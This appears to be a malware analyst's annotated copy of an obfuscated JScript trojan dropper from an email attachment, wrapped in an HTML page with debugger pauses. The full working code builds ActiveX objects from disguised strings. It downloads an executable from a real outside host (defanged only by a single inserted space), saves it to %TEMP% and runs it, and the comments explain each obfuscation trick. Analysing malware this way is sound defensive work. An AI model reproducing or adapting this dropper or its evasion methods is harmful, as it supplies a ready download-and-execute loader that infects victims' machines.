<!doctype html>
<html>
<head>
<title>Trojan FROM Mail Attachment</title>
<script>
/*
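// For browsers other than Internet Explorer: uncomment this stub to replace ActiveXObject with an inert stand-in.
// Its methods only return their arguments, do nothing, or set status to 200, so the script below can be
// stepped through in a debugger without creating any real COM objects.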
ActiveXObject = function(cmd){
this.command = cmd;
this.ExpandEnvironmentStrings = function(strOriginalString){return strOriginalString; }
this.send = function(){this.status = 200; par.status = 200;}
this.opEn = function(xmlHTTpObj,url,send){return xmlHTTpObj+" "+url; }
this.open = function(){return this.command; }
this.write = function(str){return str; }
this.saveToFile =function(filename, SaveOptions){var someaction =0;}
this.close = function(){var somraction=0;}
this.run =function(strCommand,intWindowStyle,bWaitOnReturn){var someaction =0;}
this.status = 0; this.type =0; this.position=0; this.ResponseBody ="responseObj"; par = this;
}
*/
// Analyst pause: this modal alert halts the script before any decoding runs, leaving time to set breakpoints.
alert("This is to stop Execution of this code at start and time for you to insert break points in debugger");
thickI = 0; // implicit global (no var); reused below as a moving index into BilRTKUok
// Obfuscation helper attached to every string: returns the string's first character.
String.prototype.millinery = function() {
aa = this;
return aa.charAt(8 * 0 * 8); // 8 * 0 * 8 === 0, so this is charAt(0): the first character
};
// String table holding every API name the dropper needs. Two tricks hide the values from static string matching:
//  - comma operator: ("a", "b", "c") evaluates to its LAST operand, so the dictionary words are discarded;
//  - marker text: "condo" is spliced into some names and stripped later with split("condo").join("").
// The bracketed numbers below are the indices at creation time; both splice() calls further down shift them.
var BilRTKUok = [
"p" + ("italy", "navel", "squatter", "ST") + "FV" + ("lassie", "monopolize", "neighborhood", "YI") + "rjX", // [0] "pSTFVYIrjX" - filler, not read by the code shown
"o" + "Gyfv" + "yW" + "IH" + ("crossroads", "hybrid", "stingy", "interlude", "hQ"), // [1] "oGyfvyWIHhQ" - filler, not read by the code shown
"E" + ("keyboard", "tandem", "gotten", "listen", "xp") + "an" + ("keith", "vestige", "input", "heinous", "dE") + "nv" + "ir" + ("septuagint", "bookkeeper", "greece", "scimitar", "on") + "me" + ("patio", "unleavened", "nt") + ("garnered", "adrift", "St") + ("performance", "yahoo", "ri") + ("voices", "mexico", "ngs"), // [2] "ExpandEnvironmentStrings"
"" + "%" + ("burdett", "tongs", "TE") + ("travail", "inserted", "MP%"), // [3] "%TEMP%"
"" + "." + ("followed", "casting", "second", "exe"), // [4] ".exe"
("including", "enemy", "R") + "un", // [5] "Run"
("chronology", "alexandra", "nightmare", "helicopter", "A") + "ct" + "co" + "ndoi" + "vc" + ("ranks", "homogeneous", "sudan", "decorate", "ondo") + "eX" + ("sediment", "forces", "preparation", "graphs", "cond") + "oO" + "bc" + ("revealed", "isolate", "malta", "macintosh", "on") + "do" + ("enhance", "install", "jecond") + "oct", // [6] "ActcondoivcondoeXcondoObcondojecondoct" -> "ActiveXObject" once "condo" is stripped
"nlHcwmmYdvD", // [7] filler, deleted by the first splice
"HCpQSg", // [8] filler, deleted by the first splice
"W" + "Sc" + "co" + "nd" + "or" + "ip" + "tc" + ("commissioner", "papua", "spalding", "tasting", "on") + "do." + ("manslaughter", "fiftyfive", "workstation", "halter", "S"), // [9] "WSccondoriptcondo.S" - first half of "WScript.Shell"
"LVEhhuKWtV", // [10] filler, overwritten and then deleted by the second splice
("convergence", "lamentation", "abstracts", "lynching", "hco") + "ndoe" + "lc" + "on" + ("playback", "quench", "doing", "ballet", "dol"), // [11] "hcondoelcondol" - second half of "WScript.Shell"
"BHyXGt", // [12] filler, deleted by the second splice
"V" + ("informer", "parrot", "redeem", "me") + "VY" + ("colin", "reprint", "tropical", "VS"), // [13] "VmeVYVS" - filler, not read by the code shown
("durable", "mention", "provisional", "shuttle", "McondoSXc") + ("naming", "facility", "on") + ("scamp", "privy", "doMLcond") + "o2" + ("ordinance", "distributed", "mediator", "delinquent", ".") + "co" + ("wellbred", "misshapen", "nd") + "oXMc" + "on" + ("unsaid", "leather", "jenny", "animus", "doLH") + ("pyramids", "contribution", "co") + ("extend", "suppliers", "treasury", "furniture", "nd") + "oTTP" // [14] "McondoSXcondoMLcondo2.condoXMcondoLHcondoTTP" -> "MSXML2.XMLHTTP"
]; // see img BilRTKUok-01.JPG
BilRTKUok.splice(7, thickI + 2); // thickI is 0, so splice(7, 2) deletes the two filler entries [7] and [8]; 13 entries remain; see img BilRTKUok-02.JPG
amino = BilRTKUok[1 + 4 + 1].split("condo").join(""); // index 6 -> "ActiveXObject"
// Equivalent, de-obfuscated form of the next statement:
//var WUHOHMfe = this["ActiveXObject"];
var WUHOHMfe = this[amino]; // looks the constructor up by its decoded name on `this` (the global object at script top level)
statement = (("savings", "perfidy", "qHgSeaxuhoE", "hormone", "pSCfJszNMe") + "xJwXsnxn").millinery(); // first char of "pSCfJszNMexJwXsnxn" -> statement = "p"
announcements = (("linking", "scholastic", "JgndJbrQuz", "timely", "shWLaSRGCWke") + "MRkwwfHjVT").millinery(); // first char of "shWLaSRGCWkeMRkwwfHjVT" -> announcements = "s"
thickI = 7;
BilRTKUok[thickI] = BilRTKUok[thickI] + BilRTKUok[thickI + 2]; // [7] + [9] -> BilRTKUok[7] = "WSccondoriptcondo.Shcondoelcondol"
BilRTKUok[thickI + 1] = "kAgWlwsNfXY"; // BilRTKUok[8] = "kAgWlwsNfXY" - decoy write; the entry is deleted on the next line
BilRTKUok.splice(thickI + 1, thickI - 4); // splice(8, 3) deletes THREE entries ([8], [9], [10]); the MSXML2 string moves to [9]; see img BilRTKUok-03.JPG
BilRTKUok[thickI] = BilRTKUok[thickI].split("condo").join(""); // "WSccondoriptcondo.Shcondoelcondol" is converted to "WScript.Shell"
// Equivalent, de-obfuscated form of the next statement:
//var yzavYsf = new ActiveXObject("WScript.shell");
var yzavYsf = new WUHOHMfe(BilRTKUok[thickI]); // yzavYsf = the WScript.Shell object (used for %TEMP% expansion and Run)
thickI++; // thickI = 8
BilRTKUok[thickI + 1] = BilRTKUok[thickI + 1].split("condo").join(""); // index 9: "McondoSXcondoMLcondo2.condoXMcondoLHcondoTTP" becomes "MSXML2.XMLHTTP"
// Equivalent, de-obfuscated form of the next statement:
//var QcarAWR = new ActiveXObject("MSXML2.XMLHTTP");
var QcarAWR = new WUHOHMfe(BilRTKUok[1 + thickI]); // QcarAWR = the HTTP client object used for the download
thickI /= 2; // thickI = 4; screensaver() reads BilRTKUok[thickI] (".exe") and BilRTKUok[thickI + 1] ("Run") with this value
// Equivalent, de-obfuscated form of the next statement:
//var xAbMqtec = WshShell.ExpandEnvironmentStrings("%TEMP%")
var xAbMqtec = yzavYsf[BilRTKUok[thickI - 2]](BilRTKUok[thickI - 1]); // [2] is the method name, [3] is "%TEMP%": xAbMqtec = the user's expanded temp directory
corporatee = (( "mechanics", "seraphic", "TyEzvHbHt", "disorders", "ElpAWvfz") + "TpDEqAkzD").millinery(); // first char of "ElpAWvfzTpDEqAkzD" -> corporatee = "E"
/**
 * Download-and-execute stage of the dropper (annotated for analysis).
 *
 * Sequence visible in the body: a synchronous HTTP GET of `aristocrat`; on status 200 the
 * response body is written through an ADODB.Stream to <expanded %TEMP%>/<welter>.exe, and
 * that file is then started with WScript.Shell.Run without waiting for it to finish.
 *
 * Relies on globals set up earlier in this script: xAbMqtec (temp directory), BilRTKUok
 * (string table), thickI (= 4 here), statement ("p"), announcements ("s"), corporatee ("E"),
 * WUHOHMfe (ActiveXObject), QcarAWR (MSXML2.XMLHTTP) and yzavYsf (WScript.Shell).
 *
 * Analyst note: every ProgID and method name is assembled at run time, so a literal string
 * match on this file will not find them. The behaviour that remains observable is one script
 * creating WScript.Shell, MSXML2.XMLHTTP and ADODB.Stream together, followed by an .exe being
 * written under %TEMP% and launched immediately.
 *
 * @param {string} aristocrat - URL to fetch the payload from.
 * @param {string} welter - Base name (without extension) for the file dropped in %TEMP%.
 * @returns {undefined} Nothing is returned; any exception is caught and logged to the console.
 */
function screensaver(aristocrat, welter) {
// aristocrat = "http://dev.fanjapan.com/762trg22e2. exe" as called below (the space before "exe" is the analyst's defang)
// welter = "FfXlke"
try {
var transmit = xAbMqtec + "/" + welter + BilRTKUok[thickI]; // BilRTKUok[4] is ".exe": transmit = <expanded %TEMP%> + "/FfXlke.exe"
var open ="o" + statement + corporatee + "n"; // = "opEn" (odd casing; presumably the COM object resolves method names case-insensitively - confirm)
var meth= ("improvement", "tardily", "G") + corporatee + ("rocco", "grapple", "tillage", "T"); // = "GET"
// Equivalent: MSXML2.XMLHTTP.open("GET", aristocrat, false);  third argument false = synchronous request
QcarAWR[open](meth, aristocrat, false);
var func2= announcements + ("tuition", "glinting", "unfounded", "arctic", "e") + (("unholy", "curbed", "LLpUmwQBnsk", "spurn", "kissing", "nGDOpiDLl") + "FKfAxgifRdX").millinery() + (("computer", "snail", "races", "leicestershire", "archive", "dEAqcmjkU") + "KpOALvGVT").millinery(); // "s" + "e" + "n" + "d" = "send"
QcarAWR[func2](); // MSXML2.XMLHTTP.send(); the call blocks until the response arrives because the request is synchronous
if (QcarAWR.status == 200) { // only an HTTP 200 response is written to disk and executed
var func3 = (("calibre", "hilton", "collectibles", "skating", "") + "A" + ("realistic", "invitations", "vulcan", "pO") + "DB." + "" + "S" + ("dwindle", "homework", "centered", "tr") + ("athletics", "dresses", "eam")).replace("p", "D"); // "ApODB.Stream" with the first "p" replaced by "D" = "ADODB.Stream"
// Equivalent: var hytSjp = new ActiveXObject("ADODB.Stream");
var hytSjp = new WUHOHMfe(func3);
var func4 = "" + "o" + ("fraternity", "manner", "simplified", "consent", "pen"); // = "open"
// Equivalent: ADODB.Stream.open();
hytSjp[func4]();
hytSjp.type = 0 + 3 - 2; // ADODB.Stream.type = 1 (binary stream, so the payload bytes are not re-encoded)
var func5 = "w" + ("targets", "limply", "shell", "ri") + "te" ; // = "write"
var func6 = "" + ("numeral", "drawl", "tasteful", "R") + "es" + ("defender", "typewriter", "accumulates", "necessitate", "pon") + announcements + ("carolina", "ravage", "malediction", "e") + "Bo" + "dy"; // = "ResponseBody"
// Equivalent: ADODB.Stream.write(MSXML2.XMLHTTP.ResponseBody);
hytSjp[func5](QcarAWR[func6]);
var func7 = (statement + "o" + "Di" + ("bracelet", "beast", "cheaper", "ti") + "on").replace("D", announcements); // "poDition" with "D" replaced by "s" = "position"
hytSjp[func7] = 0; // ADODB.Stream.position = 0 (rewind before saving)
var func8="s" + "av" + "eT" + ("scrimmage", "alliance", "oFile"); // = "saveToFile"
// Equivalent: ADODB.Stream.saveToFile(FileName, adSaveCreateOverWrite);  2 = create the file or overwrite an existing one
hytSjp[func8](transmit, 2);
hytSjp.close(); // ADODB.Stream.close();
// Equivalent: WScript.Shell.Run(strCommand, [intWindowStyle], [bWaitOnReturn])
// BilRTKUok[5] is "Run": the dropped file is started with window style 1 and the script does not wait for it.
yzavYsf[BilRTKUok[thickI + 1]](transmit, 1, "TPYHPf" === "LDNSGABujeo"); // "TPYHPf" === "LDNSGABujeo" is just an obfuscated `false`
}
}
catch (cNINLnxTF) {
// Any failure (object creation, network, file write, Run) ends up here and is only logged.
console.log(cNINLnxTF);
};
}
// Entry point: the only call to screensaver(). The URL is split into fragments and padded with
// comma-operator decoys; it evaluates to "http://dev.fanjapan.com/762trg22e2. exe" and the
// drop name to "FfXlke".
screensaver("h" + "tt" + ("photographic", "baleful", "formality", "p:") + "//" + "de" + "v." + "fa" + "nj" + "ap" + "an" + ".c" + ("edification", "goodfellowship", "om") + "/7" + "62" + "tr" + "g22e" + "2." + " exe", "FfXlke"); // Defanged by the analyst: an extra space was inserted before "exe" so the live payload URL is not requested
</script>
</head>
<body>
</body>
</html>